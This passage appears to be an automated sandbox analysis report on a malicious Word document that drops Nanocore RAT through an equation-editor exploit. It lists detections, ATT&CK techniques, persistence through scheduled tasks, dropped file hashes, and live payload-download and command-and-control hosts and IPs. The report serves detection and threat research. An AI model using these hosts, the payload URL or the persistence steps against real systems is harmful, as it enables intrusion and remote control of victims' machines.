        Source: RegSvcs.exe, 00000008.00000002.672012234.0000000001130000.00000002.00020000.sdmp, taskeng.exe, 0000000C.00000002.671390743.00000000006F0000.00000002.00020000.sdmpBinary or memory string: Program Manager<
        Source: RegSvcs.exe, 00000008.00000002.672442525.0000000002889000.00000004.00000001.sdmpBinary or memory string: Program Manager<
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeQueries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeQueries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 8.2.RegSvcs.exe.764629.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.384dabc.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.760000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.3848c86.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.384dabc.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.38520e5.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.plugmangd5693.exe.a1f94b8.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.760000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.plugmangd5693.exe.a1f94b8.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000008.00000002.671662373.0000000000760000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.440005121.000000000A26C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.439861078.000000000A161000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.671408794.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.673059693.0000000003826000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: plugmangd5693.exe PID: 1580, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2996, type: MEMORYSTR

        Remote Access Functionality:

        barindex
        Detected Nanocore RatShow sources
        Source: plugmangd5693.exe, 00000004.00000002.440005121.000000000A26C000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegSvcs.exeString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegSvcs.exe, 00000008.00000002.671546681.00000000005A0000.00000004.00020000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 8.2.RegSvcs.exe.764629.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.384dabc.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.760000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.3848c86.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.384dabc.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.38520e5.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.plugmangd5693.exe.a1f94b8.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.760000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.plugmangd5693.exe.a1f94b8.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000008.00000002.671662373.0000000000760000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.440005121.000000000A26C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.439861078.000000000A161000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.671408794.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.673059693.0000000003826000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: plugmangd5693.exe PID: 1580, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2996, type: MEMORYSTR
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 8_2_004D29EA bind,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 8_2_004D2998 bind,

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsNative API1Scheduled Task/Job1Access Token Manipulation1Disable or Modify Tools11Input Capture11File and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsProcess Injection312Obfuscated Files or Information2LSASS MemorySystem Information Discovery14Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Scheduled Task/Job1Software Packing13Security Account ManagerSecurity Software Discovery21SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsScheduled Task/Job1Logon Script (Mac)Logon Script (Mac)Masquerading2NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion31LSA SecretsVirtualization/Sandbox Evasion31SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol222Jamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection312DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 483042 Sample: PO-14092021.doc Startdate: 14/09/2021 Architecture: WINDOWS Score: 100 56 Multi AV Scanner detection for domain / URL 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 19 other signatures 2->62 8 EQNEDT32.EXE 10 2->8         started        13 taskeng.exe 1 2->13         started        15 smtpsvc.exe 2 2->15         started        17 WINWORD.EXE 291 23 2->17         started        process3 dnsIp4 52 lg-tv.tk 185.239.243.112, 49165, 80 CLOUDIE-AS-APCloudieLimitedHK Moldova Republic of 8->52 44 C:\Users\user\AppData\...\plugmangd5693.exe, PE32 8->44 dropped 46 C:\Users\user\AppData\...\plugmanzx[1].exe, PE32 8->46 dropped 72 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 8->72 19 plugmangd5693.exe 1 10 8->19         started        23 RegSvcs.exe 2 13->23         started        25 smtpsvc.exe 2 13->25         started        file5 signatures6 process7 file8 40 C:\Users\user\AppData\...\RWbqWnnjDWI.exe, PE32 19->40 dropped 42 C:\Users\user\AppData\Local\...\tmp3709.tmp, XML 19->42 dropped 64 Multi AV Scanner detection for dropped file 19->64 66 Machine Learning detection for dropped file 19->66 68 Uses schtasks.exe or at.exe to add and modify task schedules 19->68 70 4 other signatures 19->70 27 RegSvcs.exe 1 11 19->27         started        32 schtasks.exe 19->32         started        34 RegSvcs.exe 19->34         started        signatures9 process10 dnsIp11 54 blackbladeinc52.ddns.net 31.210.20.61, 1664 PLUSSERVER-ASN1DE Netherlands 27->54 48 C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO 27->48 dropped 50 C:\Program Files (x86)\...\smtpsvc.exe, PE32 27->50 dropped 74 Hides that the sample has been downloaded from the Internet (zone.identifier) 27->74 36 schtasks.exe 27->36         started        38 schtasks.exe 27->38         started        file12 signatures13 process14

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        PO-14092021.doc28%VirustotalBrowse
        PO-14092021.doc20%ReversingLabsDocument-RTF.Exploit.Heuristic

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\RWbqWnnjDWI.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Roaming\plugmangd5693.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exe100%Joe Sandbox ML
        C:\Program Files (x86)\SMTP Service\smtpsvc.exe0%MetadefenderBrowse
        C:\Program Files (x86)\SMTP Service\smtpsvc.exe0%ReversingLabs
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exe39%ReversingLabsByteCode-MSIL.Trojan.Taskun
        C:\Users\user\AppData\Roaming\RWbqWnnjDWI.exe39%ReversingLabsByteCode-MSIL.Trojan.Taskun
        C:\Users\user\AppData\Roaming\plugmangd5693.exe39%ReversingLabsByteCode-MSIL.Trojan.Taskun

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        8.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
        8.2.RegSvcs.exe.760000.2.unpack100%AviraTR/NanoCore.fadteDownload File

        Domains

        SourceDetectionScannerLabelLink
        lg-tv.tk15%VirustotalBrowse
        blackbladeinc52.ddns.net10%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://lg-tv.tk/plugmanzx.exe100%Avira URL Cloudmalware
        blackbladeinc52.ddns.net0%Avira URL Cloudsafe
        http://www.%s.comPA0%URL Reputationsafe
        Backup Connection Host0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        lg-tv.tk
        185.239.243.112
        truetrueunknown
        blackbladeinc52.ddns.net
        31.210.20.61
        truetrueunknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://lg-tv.tk/plugmanzx.exetrue
        • Avira URL Cloud: malware
        unknown
        blackbladeinc52.ddns.nettrue
        • Avira URL Cloud: safe
        unknown
        Backup Connection Hosttrue
        • Avira URL Cloud: safe
        low

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://www.%s.comPAplugmangd5693.exe, 00000004.00000002.427110466.0000000004D50000.00000002.00020000.sdmp, RegSvcs.exe, 00000008.00000002.673567560.0000000005800000.00000002.00020000.sdmp, taskeng.exe, 0000000C.00000002.671441665.0000000001AF0000.00000002.00020000.sdmpfalse
        • URL Reputation: safe
        low
        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.plugmangd5693.exe, 00000004.00000002.427110466.0000000004D50000.00000002.00020000.sdmpfalse
          high

          Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public

          IPDomainCountryFlagASNASN NameMalicious
          185.239.243.112
          lg-tv.tkMoldova Republic of
          55933CLOUDIE-AS-APCloudieLimitedHKtrue
          31.210.20.61
          blackbladeinc52.ddns.netNetherlands
          61157PLUSSERVER-ASN1DEtrue

          General Information

          Joe Sandbox Version:33.0.0 White Diamond
          Analysis ID:483042
          Start date:14.09.2021
          Start time:13:15:31
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 11m 57s
          Hypervisor based Inspection enabled:false
          Report type:light
          Sample file name:PO-14092021.doc
          Cookbook file name:defaultwindowsofficecookbook.jbs
          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
          Number of analysed new started processes analysed:22
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.expl.evad.winDOC@20/15@7/2
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 0.8% (good quality ratio 0.7%)
          • Quality average: 62.2%
          • Quality standard deviation: 33.7%
          HCA Information:
          • Successful, ratio: 99%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .doc
          • Found Word or Excel or PowerPoint or XPS Viewer
          • Attach to Office via COM
          • Scroll down
          • Close Viewer
          Warnings:
          Show All
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
          • TCP Packets have been reduced to 100
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
          • Report size getting too big, too many NtCreateFile calls found.
          • Report size getting too big, too many NtEnumerateValueKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryAttributesFile calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          13:16:17API Interceptor29x Sleep call for process: EQNEDT32.EXE modified
          13:16:19API Interceptor127x Sleep call for process: plugmangd5693.exe modified
          13:16:26API Interceptor4x Sleep call for process: schtasks.exe modified
          13:16:28API Interceptor1290x Sleep call for process: RegSvcs.exe modified
          13:16:29Task SchedulerRun new task: SMTP Service path: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" s>$(Arg0)
          13:16:29API Interceptor191x Sleep call for process: taskeng.exe modified
          13:16:31Task SchedulerRun new task: SMTP Service Task path: "C:\Program Files (x86)\SMTP Service\smtpsvc.exe" s>$(Arg0)
          13:16:31AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SMTP Service C:\Program Files (x86)\SMTP Service\smtpsvc.exe

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          185.239.243.112PO KV18RE001-A5193.docGet hashmaliciousBrowse
          • lg-tv.tk/whesilozx.exe
          STATEMENT OF ACCOUNT.docGet hashmaliciousBrowse
          • lg-tv.tk/bankzx.exe
          famz13 3.docGet hashmaliciousBrowse
          • fantecheo.tk/famzlogszx.exe
          8765998RQF.docGet hashmaliciousBrowse
          • fantecheo.tk/wealthzx.exe
          PHOTP.docGet hashmaliciousBrowse
          • lg-tv.tk/bluezx.exe
          Quotation Required PO3652.docGet hashmaliciousBrowse
          • fantecheo.tk/yarozx.exe
          Shipment Document BL,INV and packing list.docGet hashmaliciousBrowse
          • fantecheo.tk/bluestwozx.exe
          PO-14092021.docGet hashmaliciousBrowse
          • lg-tv.tk/plugmanzx.exe
          DHL-AWD6909800855.docGet hashmaliciousBrowse
          • fantecheo.tk/obizx.exe
          purchase invoice.exeGet hashmaliciousBrowse
          • drossmnfg.com/rult/index.php
          402021.docGet hashmaliciousBrowse
          • fantecheo.tk/kdotzx.exe
          INQUIRYORDER.docGet hashmaliciousBrowse
          • lg-tv.tk/mazx.exe
          LJUNGBY QUOTATION.docGet hashmaliciousBrowse
          • lg-tv.tk/globalzx.exe
          DHL-AWD6909800855.docGet hashmaliciousBrowse
          • fantecheo.tk/obizx.exe
          TPL020321.docGet hashmaliciousBrowse
          • lg-tv.tk/globalzx.exe
          Purchase Order.docGet hashmaliciousBrowse
          • lg-tv.tk/governorzx.exe
          quotation 2021-004.docGet hashmaliciousBrowse
          • lg-tv.tk/bluezx.exe
          famz12 4.docGet hashmaliciousBrowse
          • fantecheo.tk/famzlogszx.exe
          KOC.docGet hashmaliciousBrowse
          • fantecheo.tk/ibefrankzx.exe
          UPDATED STATEMENT OF ACCOUNT.docGet hashmaliciousBrowse
          • lg-tv.tk/bankzx.exe

          Domains

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          lg-tv.tkPO KV18RE001-A5193.docGet hashmaliciousBrowse
          • 185.239.243.112
          STATEMENT OF ACCOUNT.docGet hashmaliciousBrowse
          • 185.239.243.112
          PHOTP.docGet hashmaliciousBrowse
          • 185.239.243.112
          PO-14092021.docGet hashmaliciousBrowse
          • 185.239.243.112
          INQUIRYORDER.docGet hashmaliciousBrowse
          • 185.239.243.112
          LJUNGBY QUOTATION.docGet hashmaliciousBrowse
          • 185.239.243.112
          TPL020321.docGet hashmaliciousBrowse
          • 185.239.243.112
          Purchase Order.docGet hashmaliciousBrowse
          • 185.239.243.112
          quotation 2021-004.docGet hashmaliciousBrowse
          • 185.239.243.112
          UPDATED STATEMENT OF ACCOUNT.docGet hashmaliciousBrowse
          • 185.239.243.112
          sapa list.docGet hashmaliciousBrowse
          • 185.239.243.112
          P.O100%uFFFDpayment.doc__.rtfGet hashmaliciousBrowse
          • 185.239.243.112
          Sinovac Catalogs and Price lists.docGet hashmaliciousBrowse
          • 185.239.243.112
          WHO.docGet hashmaliciousBrowse
          • 185.239.243.112
          REQUEST_PURCHASE_INQUIRY.docGet hashmaliciousBrowse
          • 185.239.243.112
          Quotation Sample Designs.docGet hashmaliciousBrowse
          • 185.239.243.112
          Order.docGet hashmaliciousBrowse
          • 185.239.243.112
          LIST_910411.docGet hashmaliciousBrowse
          • 185.239.243.112
          ORDER.docGet hashmaliciousBrowse
          • 185.239.243.112
          Remittance copy.docGet hashmaliciousBrowse
          • 185.239.243.112

          ASN

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          PLUSSERVER-ASN1DEPO-14092021.docGet hashmaliciousBrowse
          • 31.210.20.61
          HALKBANK01.exeGet hashmaliciousBrowse
          • 31.210.20.16
          Purchase Order-PU0955387.exeGet hashmaliciousBrowse
          • 31.210.20.4
          P2021-09-13 CIW01130192.exeGet hashmaliciousBrowse
          • 31.210.20.22
          # 310573418 nuevo orden.exeGet hashmaliciousBrowse
          • 31.210.20.16
          Rally RadiatorsREQUEST.pdf.exeGet hashmaliciousBrowse
          • 31.210.20.16
          ddc0dNOK0y.exeGet hashmaliciousBrowse
          • 31.210.20.22
          PO 1210.exeGet hashmaliciousBrowse
          • 31.210.20.16
          XnLs7VLx1vGet hashmaliciousBrowse
          • 91.250.109.135
          bin.exeGet hashmaliciousBrowse
          • 31.210.20.16
          20210909161956_00023,pdf.exeGet hashmaliciousBrowse
          • 31.210.20.16
          PO 12501.exeGet hashmaliciousBrowse
          • 31.210.20.16
          X4lLneI8ZK.exeGet hashmaliciousBrowse
          • 31.210.20.16
          RFQ_PARTS PRICELIST 110-10007046,pdf.exeGet hashmaliciousBrowse
          • 31.210.20.16
          RFQ_PARTS PRICELIST 110-10007046,pdf.exeGet hashmaliciousBrowse
          • 31.210.20.16
          ROHmSaAAiGGet hashmaliciousBrowse
          • 62.138.80.204
          Bxs1wBHcNS.exeGet hashmaliciousBrowse
          • 31.210.20.251
          raoSkUREqo.exeGet hashmaliciousBrowse
          • 31.210.20.251
          jNqtcYPpUY.exeGet hashmaliciousBrowse
          • 31.210.20.251
          6WNWU8oUzk.exeGet hashmaliciousBrowse
          • 31.210.20.251
          CLOUDIE-AS-APCloudieLimitedHKPO KV18RE001-A5193.docGet hashmaliciousBrowse
          • 185.239.243.112
          STATEMENT OF ACCOUNT.docGet hashmaliciousBrowse
          • 185.239.243.112
          famz13 3.docGet hashmaliciousBrowse
          • 185.239.243.112
          8765998RQF.docGet hashmaliciousBrowse
          • 185.239.243.112
          PHOTP.docGet hashmaliciousBrowse
          • 185.239.243.112
          Quotation Required PO3652.docGet hashmaliciousBrowse
          • 185.239.243.112
          Shipment Document BL,INV and packing list.docGet hashmaliciousBrowse
          • 185.239.243.112
          PO-14092021.docGet hashmaliciousBrowse
          • 185.239.243.112
          DHL-AWD6909800855.docGet hashmaliciousBrowse
          • 185.239.243.112
          purchase invoice.exeGet hashmaliciousBrowse
          • 185.239.243.112
          402021.docGet hashmaliciousBrowse
          • 185.239.243.112
          INQUIRYORDER.docGet hashmaliciousBrowse
          • 185.239.243.112
          LJUNGBY QUOTATION.docGet hashmaliciousBrowse
          • 185.239.243.112
          DHL-AWD6909800855.docGet hashmaliciousBrowse
          • 185.239.243.112
          TPL020321.docGet hashmaliciousBrowse
          • 185.239.243.112
          Purchase Order.docGet hashmaliciousBrowse
          • 185.239.243.112
          quotation 2021-004.docGet hashmaliciousBrowse
          • 185.239.243.112
          famz12 4.docGet hashmaliciousBrowse
          • 185.239.243.112
          KOC.docGet hashmaliciousBrowse
          • 185.239.243.112
          UPDATED STATEMENT OF ACCOUNT.docGet hashmaliciousBrowse
          • 185.239.243.112

          JA3 Fingerprints

          No context

          Dropped Files

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          C:\Program Files (x86)\SMTP Service\smtpsvc.exePO-14092021.docGet hashmaliciousBrowse
            FACTURA PROFORMA- PO1122002092021.docGet hashmaliciousBrowse
              Expo Grup - 1122002092021 Sept.docGet hashmaliciousBrowse
                SWIFT COPY.docGet hashmaliciousBrowse
                  P-C3787633.docGet hashmaliciousBrowse
                    Account Statement.docGet hashmaliciousBrowse
                      NEW Order-05271.docGet hashmaliciousBrowse
                        NEW ORDER.docGet hashmaliciousBrowse
                          Nanocore.New order 22.xlsxGet hashmaliciousBrowse
                            PO83783877.xlsxGet hashmaliciousBrowse
                              DOC.1000000567.267805032019.doc__.rtfGet hashmaliciousBrowse
                                DOO STILO NOVI SAD EUR 5.200,99 20210705094119.docGet hashmaliciousBrowse
                                  SWIFT COPY.docGet hashmaliciousBrowse
                                    PROFORMA INVOICE.docGet hashmaliciousBrowse
                                      YD74eyfRAD.exeGet hashmaliciousBrowse
                                        PR0078966.xlsxGet hashmaliciousBrowse
                                          SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsxGet hashmaliciousBrowse
                                            69JCWICJ9872001.exeGet hashmaliciousBrowse
                                              Proforma 0089 05 2019.xlsxGet hashmaliciousBrowse

                                                Created / dropped Files

                                                C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):32768
                                                Entropy (8bit):3.7499114035101173
                                                Encrypted:false
                                                SSDEEP:384:DOj9Y8/gS7SDriLGKq1MHR534Jg6ihJSxUCR1rgCPKabK2t0X5P7DZ+JgySW7XxW:D+gSAdN1MH3IJFRJngyX
                                                MD5:72A9F09010A89860456C6474E2E6D25C
                                                SHA1:E4CB506146F60D01EA9E6132020DEF61974A88C3
                                                SHA-256:7299EB6E11C8704E7CB18F57879550CDD88EF7B2AE8CBA031B795BC5D92CE8E3
                                                SHA-512:BCD7EC694288BAF751C62E7CE003B4E932E86C60E0CFE67360B135FE2B9EB3BCC97DCDB484CFC9C50DC18289E824439A07EB5FF61DD2C2632F3E83ED77F0CA37
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Joe Sandbox View:
                                                • Filename: PO-14092021.doc, Detection: malicious, Browse
                                                • Filename: FACTURA PROFORMA- PO1122002092021.doc, Detection: malicious, Browse
                                                • Filename: Expo Grup - 1122002092021 Sept.doc, Detection: malicious, Browse
                                                • Filename: SWIFT COPY.doc, Detection: malicious, Browse
                                                • Filename: P-C3787633.doc, Detection: malicious, Browse
                                                • Filename: Account Statement.doc, Detection: malicious, Browse
                                                • Filename: NEW Order-05271.doc, Detection: malicious, Browse
                                                • Filename: NEW ORDER.doc, Detection: malicious, Browse
                                                • Filename: Nanocore.New order 22.xlsx, Detection: malicious, Browse
                                                • Filename: PO83783877.xlsx, Detection: malicious, Browse
                                                • Filename: DOC.1000000567.267805032019.doc__.rtf, Detection: malicious, Browse
                                                • Filename: DOO STILO NOVI SAD EUR 5.200,99 20210705094119.doc, Detection: malicious, Browse
                                                • Filename: SWIFT COPY.doc, Detection: malicious, Browse
